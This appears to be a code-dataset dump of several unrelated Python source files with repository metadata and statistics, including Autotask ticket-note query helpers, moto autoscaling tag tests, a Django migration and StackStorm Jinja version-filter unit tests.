0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
6
7f03cd5acb9ac4b1d61937350f94e1f944bd69a7
19
py
Python
coge/__init__.py
asherkhb/PyCoGe_API
ad9e642399127187d9078585a4e65dd9df05f3f7
[ "BSD-3-Clause" ]
null
null
null
coge/__init__.py
asherkhb/PyCoGe_API
ad9e642399127187d9078585a4e65dd9df05f3f7
[ "BSD-3-Clause" ]
null
null
null
coge/__init__.py
asherkhb/PyCoGe_API
ad9e642399127187d9078585a4e65dd9df05f3f7
[ "BSD-3-Clause" ]
null
null
null
from coge import *
9.5
18
0.736842
3
19
4.666667
1
0
0
0
0
0
0
0
0
0
0
0
0.210526
19
1
19
19
0.933333
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
7f1178b3e6ef0dde3e017ab52fc5e0e8835d3a09
3,478
py
Python
PqrUploadModule/notes.py
petronije2002/PqrUpload
db22af08dac1243569e5f3dd8cdb4e010b215878
[ "MIT" ]
null
null
null
PqrUploadModule/notes.py
petronije2002/PqrUpload
db22af08dac1243569e5f3dd8cdb4e010b215878
[ "MIT" ]
3
2020-03-24T17:35:36.000Z
2021-02-02T22:12:56.000Z
PqrUploadModule/notes.py
petronije2002/PqrUpload
db22af08dac1243569e5f3dd8cdb4e010b215878
[ "MIT" ]
null
null
null
# Here is the list of modules we need to import # from . import authorizations from authorizations import at,at_url,headers_at,encoded_u,encoded_u_td,td_base_url,get_headers import atws import atws.monkeypatch.attributes import pandas as pd import requests def get_notes_for_list_of_note_ids(id_=[]): query_notes=atws.Query('TicketNote') query_notes.open_bracket('AND') if len(id_)==1: query_notes.WHERE('id',query_notes.Equals,id_[0]) # query_notes.AND('NoteType',query_notes.Equals,3) #at.picklist['TicketNote']['NoteType']['Task Notes'] else: query_notes.WHERE('id',query_notes.Equals,id_[0]) # query_notes.AND('NoteType',query_notes.Equals,3) #at.picklist['TicketNote']['NoteType']['Task Notes'] for element in id_[1:]: query_notes.OR('id',query_notes.Equals,element) query_notes.close_bracket() query_notes.open_bracket('AND') query_notes.AND('NoteType',query_notes.NotEqual,13) query_notes.AND('Publish',query_notes.Equals,1) query_notes.close_bracket() notes = at.query(query_notes).fetch_all() df = pd.DataFrame([dict(note) for note in notes]) return df,notes # def get_ticket_notes_at(id_=[0]): # """ # Returns all notes, belonging to the tickets from the given list. # Parameters: # id_ [list]: list of Autotask ticket ids # at [Autotask connect object] : Autotask atws.connect object # Returns: # Tuple: (Python DataFrame, list of notes) # """ # query_notes=atws.Query('TicketNote') # query_notes.AND('NoteType',query_notes.Equals,3) # if len(id_)==1: # query_notes.WHERE('TicketID',query_notes.Equals,id_[0]) # else: # query_notes.WHERE('TicketID',query_notes.Equals,id_[0]) # for element in id_[1:]: # query_notes.OR('TicketID',query_notes.Equals,element) # notes = at.query(query_notes).fetch_all() # df = pd.DataFrame([dict(note) for note in notes]) # return df,notes def get_ticket_notes_at(id_=[0]): """ Returns all notes, belonging to the tickets from the given list. 
Parameters: id_ [list]: list of Autotask ticket ids at [Autotask connect object] : Autotask atws.connect object Returns: Tuple: (Python DataFrame, list of notes) """ query_notes=atws.Query('TicketNote') # query_notes.WHERE('NoteType',query_notes.Equals,3) # query.open_bracket('AND') query_notes.open_bracket('AND') if len(id_)==1: query_notes.WHERE('TicketID',query_notes.Equals,id_[0]) else: query_notes.WHERE('TicketID',query_notes.Equals,id_[0]) for element in id_[1:]: query_notes.OR('TicketID',query_notes.Equals,element) query_notes.close_bracket() query_notes.open_bracket('AND') query_notes.AND('NoteType',query_notes.NotEqual,13) query_notes.AND('Publish',query_notes.Equals,1) query_notes.close_bracket() notes = at.query(query_notes).fetch_all() df = pd.DataFrame([dict(note) for note in notes]) return df,notes def make_note_in_at(title='Title',descr='Long description 3200 chars',note_type=6,ticket_id=0): note = at.new('TicketNote') note.Title = title note.Description = descr note.NoteType = 3 note.TicketID= ticket_id note.Publish = 1 note.create() return note
26.549618
111
0.655549
472
3,478
4.612288
0.180085
0.220487
0.110243
0.035829
0.797887
0.779972
0.779972
0.766651
0.741387
0.741387
0
0.011778
0.218804
3,478
130
112
26.753846
0.789474
0.39333
0
0.625
0
0
0.06601
0
0
0
0
0
0
1
0.0625
false
0
0.104167
0
0.229167
0
0
0
0
null
1
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
6130cc50694ef58a70bf10e8251c3249311e9e85
168
py
Python
courses/python/cursoemvideo/exercicios/ex107_112/main.py
bdpcampos/public
dda57c265718f3e1cc0d6bce73f149051f5647ef
[ "MIT" ]
3
2020-04-28T01:42:09.000Z
2020-05-03T12:05:23.000Z
courses/python/cursoemvideo/exercicios/ex107_112/main.py
bdpcampos/public
dda57c265718f3e1cc0d6bce73f149051f5647ef
[ "MIT" ]
null
null
null
courses/python/cursoemvideo/exercicios/ex107_112/main.py
bdpcampos/public
dda57c265718f3e1cc0d6bce73f149051f5647ef
[ "MIT" ]
null
null
null
from exercicios.ex107_112.moeda import moeda from exercicios.ex107_112.dado import validacao p = validacao.leiaDinheiro('Digite o preço: R$') moeda.resumo(p, 80, 35)
24
48
0.785714
26
168
5
0.653846
0.215385
0.292308
0.338462
0
0
0
0
0
0
0
0.107383
0.113095
168
7
49
24
0.765101
0
0
0
0
0
0.106509
0
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
6
61bf92ec1a6e3287a1fb9172ae186a9aebd9900e
230
py
Python
src/common/env.py
x-blood/absolutely-stop-aws-instances
11be070c2ebcbf7499220842c6168b8cb70327b9
[ "Apache-2.0" ]
null
null
null
src/common/env.py
x-blood/absolutely-stop-aws-instances
11be070c2ebcbf7499220842c6168b8cb70327b9
[ "Apache-2.0" ]
null
null
null
src/common/env.py
x-blood/absolutely-stop-aws-instances
11be070c2ebcbf7499220842c6168b8cb70327b9
[ "Apache-2.0" ]
null
null
null
import os def get_slack_channel_id(): return os.environ['SLACK_CHANNEL_ID'] def get_slack_web_hook_url(): return os.environ['SLACK_WEB_HOOK_URL'] def get_aws_account_name(): return os.environ['AWS_ACCOUNT_NAME']
16.428571
43
0.756522
37
230
4.243243
0.405405
0.11465
0.286624
0.254777
0
0
0
0
0
0
0
0
0.13913
230
13
44
17.692308
0.792929
0
0
0
0
0
0.217391
0
0
0
0
0
0
1
0.428571
true
0
0.142857
0.428571
1
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
0
1
1
0
0
6
f61bee361b7dc06c2cf52939ece202d18dade259
8,692
py
Python
tests/test_autoscaling/test_autoscaling_tags.py
symroe/moto
4e106995af6f2820273528fca8a4e9ee288690a5
[ "Apache-2.0" ]
5,460
2015-01-01T01:11:17.000Z
2022-03-31T23:45:38.000Z
tests/test_autoscaling/test_autoscaling_tags.py
symroe/moto
4e106995af6f2820273528fca8a4e9ee288690a5
[ "Apache-2.0" ]
4,475
2015-01-05T19:37:30.000Z
2022-03-31T13:55:12.000Z
tests/test_autoscaling/test_autoscaling_tags.py
symroe/moto
4e106995af6f2820273528fca8a4e9ee288690a5
[ "Apache-2.0" ]
1,831
2015-01-14T00:00:44.000Z
2022-03-31T20:30:04.000Z
import boto3 from moto import mock_autoscaling, mock_ec2 from .utils import setup_networking from tests import EXAMPLE_AMI_ID @mock_autoscaling def test_autoscaling_tags_update(): mocked_networking = setup_networking() client = boto3.client("autoscaling", region_name="us-east-1") _ = client.create_launch_configuration( LaunchConfigurationName="test_launch_configuration", ImageId=EXAMPLE_AMI_ID, InstanceType="t2.medium", ) _ = client.create_auto_scaling_group( AutoScalingGroupName="test_asg", LaunchConfigurationName="test_launch_configuration", MinSize=0, MaxSize=20, DesiredCapacity=5, Tags=[ { "ResourceId": "test_asg", "Key": "test_key", "Value": "test_value", "PropagateAtLaunch": True, } ], VPCZoneIdentifier=mocked_networking["subnet1"], ) client.create_or_update_tags( Tags=[ { "ResourceId": "test_asg", "Key": "test_key", "Value": "updated_test_value", "PropagateAtLaunch": True, }, { "ResourceId": "test_asg", "Key": "test_key2", "Value": "test_value2", "PropagateAtLaunch": False, }, ] ) response = client.describe_auto_scaling_groups(AutoScalingGroupNames=["test_asg"]) response["AutoScalingGroups"][0]["Tags"].should.have.length_of(2) @mock_autoscaling @mock_ec2 def test_delete_tags_by_key(): mocked_networking = setup_networking() client = boto3.client("autoscaling", region_name="us-east-1") client.create_launch_configuration( LaunchConfigurationName="TestLC", ImageId=EXAMPLE_AMI_ID, InstanceType="t2.medium", ) tag_to_delete = { "ResourceId": "tag_test_asg", "ResourceType": "auto-scaling-group", "PropagateAtLaunch": True, "Key": "TestDeleteTagKey1", "Value": "TestTagValue1", } tag_to_keep = { "ResourceId": "tag_test_asg", "ResourceType": "auto-scaling-group", "PropagateAtLaunch": True, "Key": "TestTagKey1", "Value": "TestTagValue1", } client.create_auto_scaling_group( AutoScalingGroupName="tag_test_asg", MinSize=1, MaxSize=2, LaunchConfigurationName="TestLC", Tags=[tag_to_delete, tag_to_keep], VPCZoneIdentifier=mocked_networking["subnet1"], ) client.delete_tags( 
Tags=[ { "ResourceId": "tag_test_asg", "ResourceType": "auto-scaling-group", "PropagateAtLaunch": True, "Key": "TestDeleteTagKey1", } ] ) response = client.describe_auto_scaling_groups( AutoScalingGroupNames=["tag_test_asg"] ) group = response["AutoScalingGroups"][0] tags = group["Tags"] tags.should.contain(tag_to_keep) tags.should_not.contain(tag_to_delete) @mock_autoscaling def test_describe_tags_without_resources(): client = boto3.client("autoscaling", region_name="us-east-2") resp = client.describe_tags() resp.should.have.key("Tags").equals([]) resp.shouldnt.have.key("NextToken") @mock_autoscaling def test_describe_tags_no_filter(): subnet = setup_networking()["subnet1"] client = boto3.client("autoscaling", region_name="us-east-1") create_asgs(client, subnet) response = client.describe_tags() response.should.have.key("Tags").length_of(4) response["Tags"].should.contain( { "ResourceId": "test_asg", "ResourceType": "auto-scaling-group", "Key": "test_key", "Value": "updated_test_value", "PropagateAtLaunch": True, } ) response["Tags"].should.contain( { "ResourceId": "test_asg", "ResourceType": "auto-scaling-group", "Key": "test_key2", "Value": "test_value2", "PropagateAtLaunch": False, } ) response["Tags"].should.contain( { "ResourceId": "test_asg2", "ResourceType": "auto-scaling-group", "Key": "asg2tag1", "Value": "val", "PropagateAtLaunch": False, } ) response["Tags"].should.contain( { "ResourceId": "test_asg2", "ResourceType": "auto-scaling-group", "Key": "asg2tag2", "Value": "diff", "PropagateAtLaunch": False, } ) @mock_autoscaling def test_describe_tags_filter_by_name(): subnet = setup_networking()["subnet1"] client = boto3.client("autoscaling", region_name="us-east-1") create_asgs(client, subnet) response = client.describe_tags( Filters=[{"Name": "auto-scaling-group", "Values": ["test_asg"]}] ) response.should.have.key("Tags").length_of(2) response["Tags"].should.contain( { "ResourceId": "test_asg", "ResourceType": "auto-scaling-group", "Key": "test_key", 
"Value": "updated_test_value", "PropagateAtLaunch": True, } ) response["Tags"].should.contain( { "ResourceId": "test_asg", "ResourceType": "auto-scaling-group", "Key": "test_key2", "Value": "test_value2", "PropagateAtLaunch": False, } ) response = client.describe_tags( Filters=[{"Name": "auto-scaling-group", "Values": ["test_asg", "test_asg2"]}] ) response.should.have.key("Tags").length_of(4) response["Tags"].should.contain( { "ResourceId": "test_asg", "ResourceType": "auto-scaling-group", "Key": "test_key", "Value": "updated_test_value", "PropagateAtLaunch": True, } ) response["Tags"].should.contain( { "ResourceId": "test_asg", "ResourceType": "auto-scaling-group", "Key": "test_key2", "Value": "test_value2", "PropagateAtLaunch": False, } ) response["Tags"].should.contain( { "ResourceId": "test_asg2", "ResourceType": "auto-scaling-group", "Key": "asg2tag1", "Value": "val", "PropagateAtLaunch": False, } ) response["Tags"].should.contain( { "ResourceId": "test_asg2", "ResourceType": "auto-scaling-group", "Key": "asg2tag2", "Value": "diff", "PropagateAtLaunch": False, } ) @mock_autoscaling def test_describe_tags_filter_by_propgateatlaunch(): subnet = setup_networking()["subnet1"] client = boto3.client("autoscaling", region_name="us-east-1") create_asgs(client, subnet) response = client.describe_tags( Filters=[{"Name": "propagate-at-launch", "Values": ["True"]}] ) response.should.have.key("Tags").length_of(1) response["Tags"].should.contain( { "ResourceId": "test_asg", "ResourceType": "auto-scaling-group", "Key": "test_key", "Value": "updated_test_value", "PropagateAtLaunch": True, } ) def create_asgs(client, subnet): _ = client.create_launch_configuration( LaunchConfigurationName="test_launch_configuration", ImageId=EXAMPLE_AMI_ID, InstanceType="t2.medium", ) client.create_auto_scaling_group( AutoScalingGroupName="test_asg", LaunchConfigurationName="test_launch_configuration", MinSize=0, MaxSize=20, DesiredCapacity=5, VPCZoneIdentifier=subnet, ) 
client.create_auto_scaling_group( AutoScalingGroupName="test_asg2", LaunchConfigurationName="test_launch_configuration", MinSize=0, MaxSize=20, DesiredCapacity=5, Tags=[ {"Key": "asg2tag1", "Value": "val"}, {"Key": "asg2tag2", "Value": "diff"}, ], VPCZoneIdentifier=subnet, ) client.create_or_update_tags( Tags=[ { "ResourceId": "test_asg", "Key": "test_key", "Value": "updated_test_value", "PropagateAtLaunch": True, }, { "ResourceId": "test_asg", "Key": "test_key2", "Value": "test_value2", "PropagateAtLaunch": False, }, ] )
29.364865
86
0.55971
763
8,692
6.124509
0.129751
0.051787
0.068478
0.083886
0.823026
0.804622
0.779799
0.72523
0.708966
0.708966
0
0.012746
0.304993
8,692
295
87
29.464407
0.760801
0
0
0.602941
0
0
0.262655
0.014381
0
0
0
0
0
1
0.025735
false
0
0.014706
0
0.040441
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
f632b07435f03ba4c3f143216b2e2f85b74eeae5
38
py
Python
deepnlpf/__init__.py
deepnlpf/deepnlpf
6508ab1e8fd395575d606ee20223f25591541e25
[ "Apache-2.0" ]
3
2020-04-11T14:12:45.000Z
2020-05-30T16:31:06.000Z
deepnlpf/__init__.py
deepnlpf/deepnlpf
6508ab1e8fd395575d606ee20223f25591541e25
[ "Apache-2.0" ]
34
2020-03-20T19:36:40.000Z
2022-03-20T13:00:32.000Z
deepnlpf/__init__.py
deepnlpf/deepnlpf
6508ab1e8fd395575d606ee20223f25591541e25
[ "Apache-2.0" ]
1
2020-09-05T06:44:15.000Z
2020-09-05T06:44:15.000Z
from deepnlpf.pipeline import Pipeline
38
38
0.894737
5
38
6.8
0.8
0
0
0
0
0
0
0
0
0
0
0
0.078947
38
1
38
38
0.971429
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
f63495b925accbf028603acee9766da20e3c0074
80
py
Python
metasearch/__init__.py
suzanagi/materials-researchactivity-uoa-2020-public-metasearch-mosaicsearch_publication
37553698e6f778b313922dca23c4ed40530d8f31
[ "MIT" ]
null
null
null
metasearch/__init__.py
suzanagi/materials-researchactivity-uoa-2020-public-metasearch-mosaicsearch_publication
37553698e6f778b313922dca23c4ed40530d8f31
[ "MIT" ]
null
null
null
metasearch/__init__.py
suzanagi/materials-researchactivity-uoa-2020-public-metasearch-mosaicsearch_publication
37553698e6f778b313922dca23c4ed40530d8f31
[ "MIT" ]
null
null
null
from metasearch.models import ResultItem # Tests from metasearch.tests import *
20
40
0.825
10
80
6.6
0.6
0.424242
0
0
0
0
0
0
0
0
0
0
0.125
80
4
41
20
0.942857
0.0625
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
f63fe8f193376559dd3cc9a126e820175b4ba446
64
py
Python
ctf/print_N_581_times.py
inflatus/python
bc87e2ca9f40c0e53c0d6e15e364cb7dff1c6fc0
[ "MIT" ]
null
null
null
ctf/print_N_581_times.py
inflatus/python
bc87e2ca9f40c0e53c0d6e15e364cb7dff1c6fc0
[ "MIT" ]
7
2021-02-08T20:43:38.000Z
2022-03-12T00:17:16.000Z
ctf/print_N_581_times.py
inflatus/python
bc87e2ca9f40c0e53c0d6e15e364cb7dff1c6fc0
[ "MIT" ]
null
null
null
# print N 581 times # need to be followed by a 4 print 'N'*581
12.8
28
0.671875
14
64
3.071429
0.785714
0.27907
0.418605
0
0
0
0
0
0
0
0
0.145833
0.25
64
4
29
16
0.75
0.6875
0
0
0
0
0.058824
0
0
0
0
0
0
0
null
null
0
0
null
null
1
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
1
0
6
f674e8d226841f5c9d937a826aec4f5eabf244c7
172
py
Python
common/__init__.py
jkulhanek/rl-baselines-tensorflow
38726b5f2e89d56d8172a5fcc24cb4697112482e
[ "MIT" ]
null
null
null
common/__init__.py
jkulhanek/rl-baselines-tensorflow
38726b5f2e89d56d8172a5fcc24cb4697112482e
[ "MIT" ]
null
null
null
common/__init__.py
jkulhanek/rl-baselines-tensorflow
38726b5f2e89d56d8172a5fcc24cb4697112482e
[ "MIT" ]
null
null
null
from common.registry import register_trainer, make_trainer, register_agent, make_agent from common.core import AbstractAgent from common.train_wrappers import MetricContext
57.333333
86
0.883721
23
172
6.391304
0.565217
0.204082
0
0
0
0
0
0
0
0
0
0
0.081395
172
3
87
57.333333
0.93038
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
f6759e9e31e1072183c78bcbdb33102bed896643
6,125
py
Python
truffe2/units/migrations/0003_auto_20210210_1832.py
TeoGoddet/truffe2
23a963d404e5f719c0eeb273f52223ff5e3e5263
[ "BSD-2-Clause" ]
null
null
null
truffe2/units/migrations/0003_auto_20210210_1832.py
TeoGoddet/truffe2
23a963d404e5f719c0eeb273f52223ff5e3e5263
[ "BSD-2-Clause" ]
null
null
null
truffe2/units/migrations/0003_auto_20210210_1832.py
TeoGoddet/truffe2
23a963d404e5f719c0eeb273f52223ff5e3e5263
[ "BSD-2-Clause" ]
null
null
null
# Generated by Django 2.2.18 on 2021-02-10 17:32 from django.conf import settings from django.db import migrations, models import django.db.models.deletion import multiselectfield.db.fields class Migration(migrations.Migration): dependencies = [ ('units', '0002_auto_20201104_1648'), ] operations = [ migrations.AlterField( model_name='accessdelegation', name='access', field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('PRESIDENCE', 'Présidence'), ('TRESORERIE', 'Trésorerie'), ('COMMUNICATION', 'Communication'), ('INFORMATIQUE', 'Informatique'), ('ACCREDITATION', 'Accréditations'), ('LOGISTIQUE', 'Logistique'), ('SECRETARIAT', 'Secrétariat'), ('COMMISSIONS', 'Commissions')], max_length=97, null=True), ), migrations.AlterField( model_name='accessdelegation', name='role', field=models.ForeignKey(blank=True, help_text='(Optionnel !) Le rôle concerné.', null=True, on_delete=django.db.models.deletion.CASCADE, to='units.Role'), ), migrations.AlterField( model_name='accessdelegation', name='user', field=models.ForeignKey(blank=True, help_text="(Optionnel !) L'utilisateur concerné. 
L'utilisateur doit disposer d'une accréditation dans l'unité.", null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='accessdelegationlogging', name='what', field=models.CharField(choices=[('imported', 'Importé depuis Truffe 1'), ('created', 'Creation'), ('edited', 'Edité'), ('deleted', 'Supprimé'), ('restored', 'Restauré'), ('state_changed', 'Statut changé'), ('file_added', 'Fichier ajouté'), ('file_removed', 'Fichier supprimé')], max_length=64), ), migrations.AlterField( model_name='accessdelegationlogging', name='who', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='accessdelegationviews', name='who', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='accreditation', name='user', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='accreditationlog', name='type', field=models.CharField(choices=[('created', 'Créée'), ('edited', 'Modifiée'), ('deleted', 'Supprimée'), ('autodeleted', 'Supprimée automatiquement'), ('renewed', 'Renouvelée'), ('validated', 'Validée'), ('autocreated', 'Créée automatiquement')], max_length=32), ), migrations.AlterField( model_name='accreditationlog', name='who', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='role', name='access', field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('PRESIDENCE', 'Présidence'), ('TRESORERIE', 'Trésorerie'), ('COMMUNICATION', 'Communication'), ('INFORMATIQUE', 'Informatique'), ('ACCREDITATION', 'Accréditations'), ('LOGISTIQUE', 'Logistique'), ('SECRETARIAT', 'Secrétariat'), ('COMMISSIONS', 'Commissions')], max_length=97, null=True), ), migrations.AlterField( 
model_name='role', name='name', field=models.CharField(default='---', max_length=255), ), migrations.AlterField( model_name='rolelogging', name='what', field=models.CharField(choices=[('imported', 'Importé depuis Truffe 1'), ('created', 'Creation'), ('edited', 'Edité'), ('deleted', 'Supprimé'), ('restored', 'Restauré'), ('state_changed', 'Statut changé'), ('file_added', 'Fichier ajouté'), ('file_removed', 'Fichier supprimé')], max_length=64), ), migrations.AlterField( model_name='rolelogging', name='who', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='roleviews', name='who', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='unit', name='name', field=models.CharField(default='---', max_length=255), ), migrations.AlterField( model_name='unit', name='parent_hierarchique', field=models.ForeignKey(blank=True, help_text="Pour les commissions et les équipes, sélectionner le comité de l'AGEPoly. Pour les sous-commisions, sélectionner la commission parente. Pour un coaching de section, sélectionner la commission Coaching. 
Pour le comité de l'AGEPoly, ne rien mettre.", null=True, on_delete=django.db.models.deletion.CASCADE, to='units.Unit'), ), migrations.AlterField( model_name='unitlogging', name='what', field=models.CharField(choices=[('imported', 'Importé depuis Truffe 1'), ('created', 'Creation'), ('edited', 'Edité'), ('deleted', 'Supprimé'), ('restored', 'Restauré'), ('state_changed', 'Statut changé'), ('file_added', 'Fichier ajouté'), ('file_removed', 'Fichier supprimé')], max_length=64), ), migrations.AlterField( model_name='unitlogging', name='who', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='unitviews', name='who', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), ]
54.6875
381
0.631673
603
6,125
6.296849
0.240464
0.100079
0.125099
0.145115
0.802476
0.789834
0.706084
0.696076
0.671319
0.671319
0
0.01106
0.217633
6,125
111
382
55.18018
0.781302
0.00751
0
0.8
1
0.019048
0.289452
0.01481
0
0
0
0
0
1
0
false
0
0.066667
0
0.095238
0
0
0
0
null
0
0
0
1
1
1
0
0
1
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
9cb0591f499436797cf13b46c2815efe3cbdf3a7
117
py
Python
scripts/_mp_sum.py
lilleswing/SynNet
635af44d0cfe2a2015814001a3b1c809128b238a
[ "MIT" ]
14
2021-10-18T06:56:49.000Z
2022-03-01T01:32:10.000Z
scripts/_mp_sum.py
lilleswing/SynNet
635af44d0cfe2a2015814001a3b1c809128b238a
[ "MIT" ]
3
2021-10-19T20:58:09.000Z
2022-02-07T18:02:04.000Z
scripts/_mp_sum.py
lilleswing/SynNet
635af44d0cfe2a2015814001a3b1c809128b238a
[ "MIT" ]
4
2021-10-20T03:02:59.000Z
2022-01-25T22:12:47.000Z
""" Computes the sum of a single molecular embedding. """ import numpy as np def func(emb): return np.sum(emb)
13
49
0.683761
19
117
4.210526
0.842105
0
0
0
0
0
0
0
0
0
0
0
0.205128
117
8
50
14.625
0.860215
0.418803
0
0
0
0
0
0
0
0
0
0
0
1
0.333333
false
0
0.333333
0.333333
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
1
1
0
0
6
9cbacd7dcbeea8ce566d9f08b2e0008d0eca7eed
5,870
py
Python
st2common/tests/unit/test_jinja_render_version_filters.py
kkkanil/st2
07cd195d7a6e177a37dd019e5c9ab8329259d0fa
[ "Apache-2.0" ]
null
null
null
st2common/tests/unit/test_jinja_render_version_filters.py
kkkanil/st2
07cd195d7a6e177a37dd019e5c9ab8329259d0fa
[ "Apache-2.0" ]
15
2021-02-11T22:58:54.000Z
2021-08-06T18:03:47.000Z
st2common/tests/unit/test_jinja_render_version_filters.py
kkkanil/st2
07cd195d7a6e177a37dd019e5c9ab8329259d0fa
[ "Apache-2.0" ]
1
2021-07-10T15:02:29.000Z
2021-07-10T15:02:29.000Z
# Copyright 2020 The StackStorm Authors. # Copyright 2019 Extreme Networks, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import absolute_import import unittest2 from st2common.util import jinja as jinja_utils class JinjaUtilsVersionsFilterTestCase(unittest2.TestCase): def test_version_compare(self): env = jinja_utils.get_jinja_environment() template = '{{version | version_compare("0.10.0")}}' actual = env.from_string(template).render({'version': '0.9.0'}) expected = '-1' self.assertEqual(actual, expected) template = '{{version | version_compare("0.10.0")}}' actual = env.from_string(template).render({'version': '0.10.1'}) expected = '1' self.assertEqual(actual, expected) template = '{{version | version_compare("0.10.0")}}' actual = env.from_string(template).render({'version': '0.10.0'}) expected = '0' self.assertEqual(actual, expected) def test_version_more_than(self): env = jinja_utils.get_jinja_environment() template = '{{version | version_more_than("0.10.0")}}' actual = env.from_string(template).render({'version': '0.9.0'}) expected = 'False' self.assertEqual(actual, expected) template = '{{version | version_more_than("0.10.0")}}' actual = env.from_string(template).render({'version': '0.10.1'}) expected = 'True' self.assertEqual(actual, expected) template = '{{version | version_more_than("0.10.0")}}' actual = env.from_string(template).render({'version': '0.10.0'}) expected = 'False' self.assertEqual(actual, expected) def test_version_less_than(self): env 
= jinja_utils.get_jinja_environment() template = '{{version | version_less_than("0.10.0")}}' actual = env.from_string(template).render({'version': '0.9.0'}) expected = 'True' self.assertEqual(actual, expected) template = '{{version | version_less_than("0.10.0")}}' actual = env.from_string(template).render({'version': '0.10.1'}) expected = 'False' self.assertEqual(actual, expected) template = '{{version | version_less_than("0.10.0")}}' actual = env.from_string(template).render({'version': '0.10.0'}) expected = 'False' self.assertEqual(actual, expected) def test_version_equal(self): env = jinja_utils.get_jinja_environment() template = '{{version | version_equal("0.10.0")}}' actual = env.from_string(template).render({'version': '0.9.0'}) expected = 'False' self.assertEqual(actual, expected) template = '{{version | version_equal("0.10.0")}}' actual = env.from_string(template).render({'version': '0.10.1'}) expected = 'False' self.assertEqual(actual, expected) template = '{{version | version_equal("0.10.0")}}' actual = env.from_string(template).render({'version': '0.10.0'}) expected = 'True' self.assertEqual(actual, expected) def test_version_match(self): env = jinja_utils.get_jinja_environment() template = '{{version | version_match(">0.10.0")}}' actual = env.from_string(template).render({'version': '0.10.1'}) expected = 'True' self.assertEqual(actual, expected) actual = env.from_string(template).render({'version': '0.1.1'}) expected = 'False' self.assertEqual(actual, expected) template = '{{version | version_match("<0.10.0")}}' actual = env.from_string(template).render({'version': '0.1.0'}) expected = 'True' self.assertEqual(actual, expected) actual = env.from_string(template).render({'version': '1.1.0'}) expected = 'False' self.assertEqual(actual, expected) template = '{{version | version_match("==0.10.0")}}' actual = env.from_string(template).render({'version': '0.10.0'}) expected = 'True' self.assertEqual(actual, expected) actual = 
env.from_string(template).render({'version': '0.10.1'}) expected = 'False' self.assertEqual(actual, expected) def test_version_bump_major(self): env = jinja_utils.get_jinja_environment() template = '{{version | version_bump_major}}' actual = env.from_string(template).render({'version': '0.10.1'}) expected = '1.0.0' self.assertEqual(actual, expected) def test_version_bump_minor(self): env = jinja_utils.get_jinja_environment() template = '{{version | version_bump_minor}}' actual = env.from_string(template).render({'version': '0.10.1'}) expected = '0.11.0' self.assertEqual(actual, expected) def test_version_bump_patch(self): env = jinja_utils.get_jinja_environment() template = '{{version | version_bump_patch}}' actual = env.from_string(template).render({'version': '0.10.1'}) expected = '0.10.2' self.assertEqual(actual, expected) def test_version_strip_patch(self): env = jinja_utils.get_jinja_environment() template = '{{version | version_strip_patch}}' actual = env.from_string(template).render({'version': '0.10.1'}) expected = '0.10' self.assertEqual(actual, expected)
37.870968
74
0.634072
710
5,870
5.090141
0.152113
0.026563
0.079137
0.115661
0.799945
